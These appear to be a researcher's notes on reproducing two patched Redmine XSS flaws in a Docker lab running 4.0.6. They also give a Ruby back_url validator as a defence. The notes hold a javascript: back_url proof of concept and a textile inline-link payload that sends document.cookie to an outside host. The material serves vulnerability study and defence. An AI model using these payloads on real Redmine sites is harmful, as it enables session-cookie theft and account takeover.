Advisories: https://www.redmine.org/projects/redmine/wiki/Security_Advisories
Let's find a POC for the following vulns:
- Persistent XSS vulnerabilities in textile inline links (#32934)
- XSS vulnerability due to missing back_url validation (#32850)
Both issues were fixed in 4.1.1 and 4.0.7.
Checking the diff between 4.0.6 and 4.0.7:
https://github.com/redmine/redmine/compare/4.0.6...4.0.7
Main fix for #32850 is here: https://github.com/redmine/redmine/compare/4.0.6...4.0.7#diff-5f3fc5e3977d242572aa1d08551f5eb557de0ccaff30370838ee9df5386ea0daR1301
Main fix for #32934 is here: https://github.com/redmine/redmine/compare/4.0.6...4.0.7#diff-7fd35a152b4d6f80a5c756100ef0ab7435852c04a2c473e9d8d0b016203b5a33R853
POC for #32850: http://localhost:8080/projects/test/time_entries/new?back_url=javascript:alert(1) then click on cancel (tested on 4.0.6).
POC for #32934:
!nope.com(Click Me)!:javascript:document.location='example.com?cookie='+document.cookie)
https://www.redmine.org/projects/redmine/wiki/RedmineTextFormattingMarkdown
FYI: https://plan.io/redmine-security-scanner/
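For the defensive side of #32850, here is an added example (my own code, not Redmine's fix) of a back_url validator that only ever returns a same-origin relative path; the request_scheme/request_host/request_port parameters stand in for the current request and are assumptions taken from the stack below.

```ruby
require 'uri'
require 'cgi'

# Added example, not Redmine's own code: reduce a user-supplied back_url to a
# same-origin relative path, or return nil if it cannot be trusted.
# request_scheme/request_host/request_port stand in for the current request
# (values assumed from the docker-compose stack used on this page).
def safe_back_url(back_url, request_scheme: 'http', request_host: 'localhost', request_port: 8080)
  return nil if back_url.nil? || back_url.strip.empty?
  # Reject path traversal, including percent-encoded forms such as %2e%2e
  return nil if CGI.unescape(back_url).include?('..')

  begin
    uri = URI.parse(back_url)
  rescue URI::InvalidURIError
    return nil
  end

  # Only scheme-less or http(s) URLs; javascript:, data:, vbscript: fail here
  scheme = uri.scheme&.downcase
  return nil unless scheme.nil? || %w[http https].include?(scheme)

  # Absolute (or protocol-relative //host) URLs must name our own origin
  if uri.host
    return nil unless scheme == request_scheme && uri.host == request_host && uri.port == request_port
  end
  # Never carry user:password@ along
  return nil if uri.userinfo

  path = uri.path.to_s
  path += "?#{uri.query}" if uri.query
  # Must be a rooted path starting with exactly one slash
  return nil unless path.match?(%r{\A/([^/]|\z)})
  path
end

if __FILE__ == $PROGRAM_NAME
  ['javascript:alert(1)', '//evil.example/x', 'http://localhost:8080/projects/test',
   '/projects/test/issues?set_filter=1'].each do |u|
    puts "#{u.inspect} -> #{safe_back_url(u).inspect}"
  end
end
```

The redirect target (the cancel link) should then be built only from the returned path, falling back to a fixed default when the result is nil.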
There is an official Docker image for Redmine: https://hub.docker.com/_/redmine
I used the following stack:
version: '3.1'
services:
  redmine:
    image: redmine:4.0.6
    restart: always
    ports:
      - 8080:3000
    environment:
      REDMINE_DB_MYSQL: db
      REDMINE_DB_PASSWORD: example
      REDMINE_SECRET_KEY_BASE: supersecretkey
  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: example
      MYSQL_DATABASE: redmine
docker-compose -f stack.yml up